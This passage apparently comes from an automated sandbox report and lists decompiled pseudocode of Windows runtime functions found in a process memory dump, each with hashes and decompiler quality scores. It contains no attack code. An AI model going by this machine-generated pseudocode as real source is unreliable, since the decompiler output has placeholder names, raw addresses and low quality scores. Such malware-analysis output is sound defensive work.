                        • Opcode Fuzzy Hash: 18032410502b28624a61534d306fda4ff3188ae1ac31d7d290b6765319b548f9
                        • Instruction Fuzzy Hash: 0B319131601B04CFD725DF28C844B96B3E6FF88714F1449ADE89AC7750DB75A841CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E02B76C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                        				signed short* _v8;
                        				signed char _v12;
                        				void* _t22;
                        				signed char* _t23;
                        				intOrPtr _t24;
                        				signed short* _t44;
                        				void* _t47;
                        				signed char* _t56;
                        				signed char* _t58;
                        
                        				_t48 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t44 = __ecx;
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				_t22 = E02B17D50();
                        				_t58 = 0x7ffe0384;
                        				if(_t22 == 0) {
                        					_t23 = 0x7ffe0384;
                        				} else {
                        					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				}
                        				if( *_t23 != 0) {
                        					_t24 =  *0x2be7b9c; // 0x0
                        					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                        					_t23 = L02B14620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                        					_t56 = _t23;
                        					if(_t56 != 0) {
                        						_t56[0x24] = _a4;
                        						_t56[0x28] = _a8;
                        						_t56[6] = 0x1420;
                        						_t56[0x20] = _v12;
                        						_t14 =  &(_t56[0x2c]); // 0x2c
                        						E02B3F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                        						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                        						if(E02B17D50() != 0) {
                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						}
                        						_push(_t56);
                        						_push(_t47 - 0x20);
                        						_push(0x402);
                        						_push( *_t58 & 0x000000ff);
                        						E02B39AE0();
                        						_t23 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                        					}
                        				}
                        				return _t23;
                        			}


                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: 2624bf1e7ff070e4ed5168702073321f944ca2f2482240d71961f7fa6259fabd
                        • Instruction ID: 28596dffd0a4fadaa0dbaef7e95f096f7ef434ed6f0c372ed408f9e516107e44
                        • Opcode Fuzzy Hash: 2624bf1e7ff070e4ed5168702073321f944ca2f2482240d71961f7fa6259fabd
                        • Instruction Fuzzy Hash: BB218BB1A00A44AFC715DB69D880E6AB7B8FF48744F1440A9F904DBB91DB34ED10CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E02B390AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                        				intOrPtr* _v0;
                        				void* _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				char _v36;
                        				void* _t38;
                        				intOrPtr _t41;
                        				void* _t44;
                        				signed int _t45;
                        				intOrPtr* _t49;
                        				signed int _t57;
                        				signed int _t58;
                        				intOrPtr* _t59;
                        				void* _t62;
                        				void* _t63;
                        				void* _t65;
                        				void* _t66;
                        				signed int _t69;
                        				intOrPtr* _t70;
                        				void* _t71;
                        				intOrPtr* _t72;
                        				intOrPtr* _t73;
                        				char _t74;
                        
                        				_t65 = __edx;
                        				_t57 = _a4;
                        				_t32 = __ecx;
                        				_v8 = __edx;
                        				_t3 = _t32 + 0x14c; // 0x14c
                        				_t70 = _t3;
                        				_v16 = __ecx;
                        				_t72 =  *_t70;
                        				while(_t72 != _t70) {
                        					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                        						L24:
                        						_t72 =  *_t72;
                        						continue;
                        					}
                        					_t30 = _t72 + 0x10; // 0x10
                        					if(E02B4D4F0(_t30, _t65, _t57) == _t57) {
                        						return 0xb7;
                        					}
                        					_t65 = _v8;
                        					goto L24;
                        				}
                        				_t61 = _t57;
                        				_push( &_v12);
                        				_t66 = 0x10;
                        				if(E02B2E5E0(_t57, _t66) < 0) {
                        					return 0x216;
                        				}
                        				_t73 = L02B14620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                        				if(_t73 == 0) {
                        					_t38 = 0xe;
                        					return _t38;
                        				}
                        				_t9 = _t73 + 0x10; // 0x10
                        				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                        				E02B3F3E0(_t9, _v8, _t57);
                        				_t41 =  *_t70;
                        				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                        					_t62 = 3;
                        					asm("int 0x29");
                        					_push(_t62);
                        					_push(_t57);
                        					_push(_t73);
                        					_push(_t70);
                        					_t71 = _t62;
                        					_t74 = 0;
                        					_v36 = 0;
                        					_t63 = E02B2A2F0(_t62, _t71, 1, 6,  &_v36);
                        					if(_t63 == 0) {
                        						L20:
                        						_t44 = 0x57;
                        						return _t44;
                        					}
                        					_t45 = _v12;
                        					_t58 = 0x1c;
                        					if(_t45 < _t58) {
                        						goto L20;
                        					}
                        					_t69 = _t45 / _t58;
                        					if(_t69 == 0) {
                        						L19:
                        						return 0xe8;
                        					}
                        					_t59 = _v0;
                        					do {
                        						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                        							goto L18;
                        						}
                        						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                        						 *_t59 = _t49;
                        						if( *_t49 != 0x53445352) {
                        							goto L18;
                        						}
                        						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                        						return 0;
                        						L18:
                        						_t63 = _t63 + 0x1c;
                        						_t74 = _t74 + 1;
                        					} while (_t74 < _t69);
                        					goto L19;
                        				}
                        				 *_t73 = _t41;
                        				 *((intOrPtr*)(_t73 + 4)) = _t70;
                        				 *((intOrPtr*)(_t41 + 4)) = _t73;
                        				 *_t70 = _t73;
                        				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                        				return 0;
                        			}


                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction ID: 86f14f13fa2aaf25e6582246bbc26a0bab5095fb88316356cd458a0b82057f6e
                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction Fuzzy Hash: 6E215E71A00A05EFDB21DF59C884EAAF7F8EB44354F1488BAE999A7210D770ED44CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E02B23B7A(void* __ecx) {
                        				signed int _v8;
                        				char _v12;
                        				intOrPtr _v20;
                        				intOrPtr _t17;
                        				intOrPtr _t26;
                        				void* _t35;
                        				void* _t38;
                        				void* _t41;
                        				intOrPtr _t44;
                        
                        				_t17 =  *0x2be84c4; // 0x0
                        				_v12 = 1;
                        				_v8 =  *0x2be84c0 * 0x4c;
                        				_t41 = __ecx;
                        				_t35 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x2be84c0 * 0x4c);
                        				if(_t35 == 0) {
                        					_t44 = 0xc0000017;
                        				} else {
                        					_push( &_v8);
                        					_push(_v8);
                        					_push(_t35);
                        					_push(4);
                        					_push( &_v12);
                        					_push(0x6b);
                        					_t44 = E02B3AA90();
                        					_v20 = _t44;
                        					if(_t44 >= 0) {
                        						E02B3FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x2be84c0 * 0xc);
                        						_t38 = _t35;
                        						if(_t35 < _v8 + _t35) {
                        							do {
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                        							} while (_t38 < _v8 + _t35);
                        							_t44 = _v20;
                        						}
                        					}
                        					_t26 =  *0x2be84c4; // 0x0
                        					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                        				}
                        				return _t44;
                        			}


                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: 2c524efa06b2d4d182873797134e28ca933410e1eb88a69da67fc9376c315bed
                        • Instruction ID: f3638592a5d3c82636ac978ab55c48a6b19ccbebc72c2831b3fbd46a96b1920f
                        • Opcode Fuzzy Hash: 2c524efa06b2d4d182873797134e28ca933410e1eb88a69da67fc9376c315bed
                        • Instruction Fuzzy Hash: 8021B072A00618EFDB01DF58CD81B6AB7BDFF40348F1500A8E508AB261C775AD55DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E02B76CF0(void* __edx, intOrPtr _a4, short _a8) {
                        				char _v8;
                        				char _v12;
                        				char _v16;
                        				char _v20;
                        				char _v28;
                        				char _v36;
                        				char _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed char* _t21;
                        				void* _t24;
                        				void* _t36;
                        				void* _t38;
                        				void* _t46;
                        
                        				_push(_t36);
                        				_t46 = __edx;
                        				_v12 = 0;
                        				_v8 = 0;
                        				_v20 = 0;
                        				_v16 = 0;
                        				if(E02B17D50() == 0) {
                        					_t21 = 0x7ffe0384;
                        				} else {
                        					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                        				}
                        				if( *_t21 != 0) {
                        					_t21 =  *[fs:0x30];
                        					if((_t21[0x240] & 0x00000004) != 0) {
                        						if(E02B17D50() == 0) {
                        							_t21 = 0x7ffe0385;
                        						} else {
                        							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                        						}
                        						if(( *_t21 & 0x00000020) != 0) {
                        							_t56 = _t46;
                        							if(_t46 == 0) {
                        								_t46 = 0x2ad5c80;
                        							}
                        							_push(_t46);
                        							_push( &_v12);
                        							_t24 = E02B2F6E0(_t36, 0, _t46, _t56);
                        							_push(_a4);
                        							_t38 = _t24;
                        							_push( &_v28);
                        							_t21 = E02B2F6E0(_t38, 0, _t46, _t56);
                        							if(_t38 != 0) {
                        								if(_t21 != 0) {
                        									E02B77016(_a8, 0, 0, 0,  &_v36,  &_v28);
                        									L02B12400( &_v52);
                        								}
                        								_t21 = L02B12400( &_v28);
                        							}
                        						}
                        					}
                        				}
                        				return _t21;
                        			}




















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e46cae05a39e809a0cb1e84bb1f781e5c63d69c6c234f42b0d9bf44538ad5cf4
                        • Instruction ID: 27b07e1eb900cb5e2ebe5e9d3104db0c50bf921f2d35940ce98eef7a19567755
                        • Opcode Fuzzy Hash: e46cae05a39e809a0cb1e84bb1f781e5c63d69c6c234f42b0d9bf44538ad5cf4
                        • Instruction Fuzzy Hash: FF21D072510B449FC311DF6AC944BABB7EDEF81744F080496FD6087290EB34C909CAA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02BC070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                        				char _v8;
                        				intOrPtr _v11;
                        				signed int _v12;
                        				intOrPtr _v15;
                        				signed int _v16;
                        				intOrPtr _v28;
                        				void* __ebx;
                        				char* _t32;
                        				signed int* _t38;
                        				signed int _t60;
                        
                        				_t38 = __ecx;
                        				_v16 = __edx;
                        				_t60 = E02BC07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                        				if(_t60 != 0) {
                        					_t7 = _t38 + 0x38; // 0x29cd5903
                        					_push( *_t7);
                        					_t9 = _t38 + 0x34; // 0x6adeeb00
                        					_push( *_t9);
                        					_v12 = _a8 << 0xc;
                        					_t11 = _t38 + 4; // 0x5de58b5b
                        					_push(0x4000);
                        					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                        					E02BBAFDE( &_v8,  &_v12);
                        					E02BC1293(_t38, _v28, _t60);
                        					if(E02B17D50() == 0) {
                        						_t32 = 0x7ffe0380;
                        					} else {
                        						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						_t21 = _t38 + 0x3c; // 0xc3595e5f
                        						E02BB14FB(_t38,  *_t21, _v11, _v15, 0xd);
                        					}
                        				}
                        				return  ~_t60;
                        			}














                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction ID: a5bbfafcea3cae5d24bcdabd71aafce7f4b25354bf9f2b339c557d4882f017fb
                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction Fuzzy Hash: 5C2107363042049FD705DF18C884BAABBA6EFC4750F1485ADF9959B385DB30D909CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E02B1AE73(intOrPtr __ecx, void* __edx) {
                        				intOrPtr _v8;
                        				void* _t19;
                        				char* _t22;
                        				signed char* _t24;
                        				intOrPtr _t25;
                        				intOrPtr _t27;
                        				void* _t31;
                        				intOrPtr _t36;
                        				char* _t38;
                        				signed char* _t42;
                        
                        				_push(__ecx);
                        				_t31 = __edx;
                        				_v8 = __ecx;
                        				_t19 = E02B17D50();
                        				_t38 = 0x7ffe0384;
                        				if(_t19 != 0) {
                        					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				} else {
                        					_t22 = 0x7ffe0384;
                        				}
                        				_t42 = 0x7ffe0385;
                        				if( *_t22 != 0) {
                        					if(E02B17D50() == 0) {
                        						_t24 = 0x7ffe0385;
                        					} else {
                        						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        					}
                        					if(( *_t24 & 0x00000010) != 0) {
                        						goto L17;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					_t27 = E02B17D50();
                        					if(_t27 != 0) {
                        						_t27 =  *[fs:0x30];
                        						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                        					}
                        					if( *_t38 != 0) {
                        						_t27 =  *[fs:0x30];
                        						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                        							goto L5;
                        						}
                        						_t27 = E02B17D50();
                        						if(_t27 != 0) {
                        							_t27 =  *[fs:0x30];
                        							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                        						}
                        						if(( *_t42 & 0x00000020) != 0) {
                        							L17:
                        							_t25 = _v8;
                        							_t36 = 0;
                        							if(_t25 != 0) {
                        								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                        							}
                        							_t27 = E02B77794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                        						}
                        						goto L5;
                        					} else {
                        						L5:
                        						return _t27;
                        					}
                        				}
                        			}














                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction ID: facb7e836c08d79f3bd1cc48e427ac969dfcaeab355e6ec5ecada3a580a48087
                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction Fuzzy Hash: 67210572602685DFE726DB68C948B3577E9EF45354F1900E0DD048B7A2EB78EC40CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E02B77794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _t21;
                        				void* _t24;
                        				intOrPtr _t25;
                        				void* _t36;
                        				short _t39;
                        				signed char* _t42;
                        				unsigned int _t46;
                        				void* _t50;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t21 =  *0x2be7b9c; // 0x0
                        				_t46 = _a8;
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				_t4 = _t46 + 0x2e; // 0x2e
                        				_t36 = _t4;
                        				_t24 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                        				_t50 = _t24;
                        				if(_t50 != 0) {
                        					_t25 = _a4;
                        					if(_t25 == 5) {
                        						L3:
                        						_t39 = 0x14b1;
                        					} else {
                        						_t39 = 0x14b0;
                        						if(_t25 == 6) {
                        							goto L3;
                        						}
                        					}
                        					 *((short*)(_t50 + 6)) = _t39;
                        					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                        					_t11 = _t50 + 0x2c; // 0x2c
                        					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                        					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                        					E02B3F3E0(_t11, _a12, _t46);
                        					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                        					if(E02B17D50() == 0) {
                        						_t42 = 0x7ffe0384;
                        					} else {
                        						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					_push(_t50);
                        					_t19 = _t36 - 0x20; // 0xe
                        					_push(0x403);
                        					_push( *_t42 & 0x000000ff);
                        					E02B39AE0();
                        					_t24 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                        				}
                        				return _t24;
                        			}














                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f55c84d1046ae4769a8a61ece46fbf65c40693d6ccb87a4fe6bc68b58a628900
                        • Instruction ID: 8d68f921577045b632993cafe86529df359080a6dafc50c032d97bbabee6cdef
                        • Opcode Fuzzy Hash: f55c84d1046ae4769a8a61ece46fbf65c40693d6ccb87a4fe6bc68b58a628900
                        • Instruction Fuzzy Hash: 78218E72900604AFC725DF69D890EABB7B9EF48740F1045ADF51AD7750EB34E900DBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02B2FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				intOrPtr _v8;
                        				void* _t19;
                        				intOrPtr _t29;
                        				intOrPtr _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t37;
                        				intOrPtr* _t40;
                        
                        				_t35 = __edx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t37 = 0;
                        				_v8 = __edx;
                        				_t29 = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                        					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                        					L3:
                        					_t19 = _a4 - 4;
                        					if(_t19 != 0) {
                        						if(_t19 != 1) {
                        							L7:
                        							return _t37;
                        						}
                        						if(_t35 == 0) {
                        							L11:
                        							_t37 = 0xc000000d;
                        							goto L7;
                        						}
                        						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                        							_t35 = _v8;
                        						}
                        						 *((intOrPtr*)(_t40 + 4)) = _t35;
                        						goto L7;
                        					}
                        					if(_t29 == 0) {
                        						goto L11;
                        					}
                        					_t32 =  *_t40;
                        					if(_t32 != 0) {
                        						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                        						E02B076E2( *_t40);
                        					}
                        					 *_t40 = _t29;
                        					goto L7;
                        				}
                        				_t40 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                        				if(_t40 == 0) {
                        					_t37 = 0xc0000017;
                        					goto L7;
                        				}
                        				_t35 = _v8;
                        				 *_t40 = 0;
                        				 *((intOrPtr*)(_t40 + 4)) = 0;
                        				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                        				goto L3;
                        			}











                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction ID: df78616d17afecfd936759f2ad5d9ee4c633506e5c6d456226bc8f6f9b7f2fc9
                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction Fuzzy Hash: F3215772600B50DBC7328F49C540A76F7B6EB98B50F2485AEE94E87A11D730AC04DB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E02AF9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t41;
                        				intOrPtr* _t46;
                        				void* _t48;
                        				intOrPtr _t50;
                        				intOrPtr* _t60;
                        				void* _t61;
                        				intOrPtr _t62;
                        				intOrPtr _t65;
                        				void* _t66;
                        				void* _t68;
                        
                        				_push(0xc);
                        				_push(0x2bcf708);
                        				E02B4D08C(__ebx, __edi, __esi);
                        				_t65 = __ecx;
                        				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                        				if( *(__ecx + 0x24) != 0) {
                        					_push( *(__ecx + 0x24));
                        					E02B395D0();
                        					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                        				}
                        				L6();
                        				L6();
                        				_push( *((intOrPtr*)(_t65 + 0x28)));
                        				E02B395D0();
                        				_t33 =  *0x2be84c4; // 0x0
                        				L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                        				_t37 =  *0x2be84c4; // 0x0
                        				L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                        				_t41 =  *0x2be84c4; // 0x0
                        				E02B12280(L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x2be86b4);
                        				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                        				_t46 = _t65 + 0xe8;
                        				_t62 =  *_t46;
                        				_t60 =  *((intOrPtr*)(_t46 + 4));
                        				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                        					_t61 = 3;
                        					asm("int 0x29");
                        					_push(_t65);
                        					_t66 = _t61;
                        					_t23 = _t66 + 0x14; // 0x8df8084c
                        					_push( *_t23);
                        					E02B395D0();
                        					_t24 = _t66 + 0x10; // 0x89e04d8b
                        					_push( *_t24);
                        					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                        					_t48 = E02B395D0();
                        					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                        					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                        					return _t48;
                        				} else {
                        					 *_t60 = _t62;
                        					 *((intOrPtr*)(_t62 + 4)) = _t60;
                        					 *(_t68 - 4) = 0xfffffffe;
                        					E02AF9325();
                        					_t50 =  *0x2be84c4; // 0x0
                        					return E02B4D0D1(L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                        				}
                        			}
















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 0654ed6081fe247cac6c0fee98300aaf8f854cddd19005bbcd122802cedba6ae
                        • Instruction ID: e0dc04a0c15ad5631e8125d5df49f5ceb98b83ff9fc938333621294105302de6
                        • Opcode Fuzzy Hash: 0654ed6081fe247cac6c0fee98300aaf8f854cddd19005bbcd122802cedba6ae
                        • Instruction Fuzzy Hash: 77212A72581A01DFC762EF68CA40F1AB7BAFF08704F1545ACA14A876B1CB39E951DF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02B2B390(void* __ecx, intOrPtr _a4) {
                        				signed int _v8;
                        				signed char _t12;
                        				signed int _t16;
                        				signed int _t21;
                        				void* _t28;
                        				signed int _t30;
                        				signed int _t36;
                        				signed int _t41;
                        
                        				_push(__ecx);
                        				_t41 = _a4 + 0xffffffb8;
                        				E02B12280(_t12, 0x2be8608);
                        				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                        				asm("sbb edi, edi");
                        				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                        				_v8 = _t36;
                        				asm("lock cmpxchg [ebx], ecx");
                        				_t30 = 1;
                        				if(1 != 1) {
                        					while(1) {
                        						_t21 = _t30 & 0x00000006;
                        						_t16 = _t30;
                        						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                        						asm("lock cmpxchg [edi], esi");
                        						if(_t16 == _t30) {
                        							break;
                        						}
                        						_t30 = _t16;
                        					}
                        					_t36 = _v8;
                        					if(_t21 == 2) {
                        						_t16 = E02B300C2(0x2be8608, 0, _t28);
                        					}
                        				}
                        				if(_t36 != 0) {
                        					_t16 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                        				}
                        				return _t16;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c6422308709a21e9b16a6ac271ef8abe35c53c4bfddf7adfb1612617fd8df80
                        • Instruction ID: 31b3d98d7b0ee5fa257b5396ada9f3b8a991e3de2b0b13ca08bfcb688863bc83
                        • Opcode Fuzzy Hash: 4c6422308709a21e9b16a6ac271ef8abe35c53c4bfddf7adfb1612617fd8df80
                        • Instruction Fuzzy Hash: 321148333012209FCF299A148E81B2B7357EBC5330B2881A9DD1BE7390CE359C06C6D4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E02B84257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                        				intOrPtr* _t18;
                        				intOrPtr _t24;
                        				intOrPtr* _t27;
                        				intOrPtr* _t30;
                        				intOrPtr* _t31;
                        				intOrPtr _t33;
                        				intOrPtr* _t34;
                        				intOrPtr* _t35;
                        				void* _t37;
                        				void* _t38;
                        				void* _t39;
                        				void* _t43;
                        
                        				_t39 = __eflags;
                        				_t35 = __edi;
                        				_push(8);
                        				_push(0x2bd08d0);
                        				E02B4D08C(__ebx, __edi, __esi);
                        				_t37 = __ecx;
                        				E02B841E8(__ebx, __edi, __ecx, _t39);
                        				E02B0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
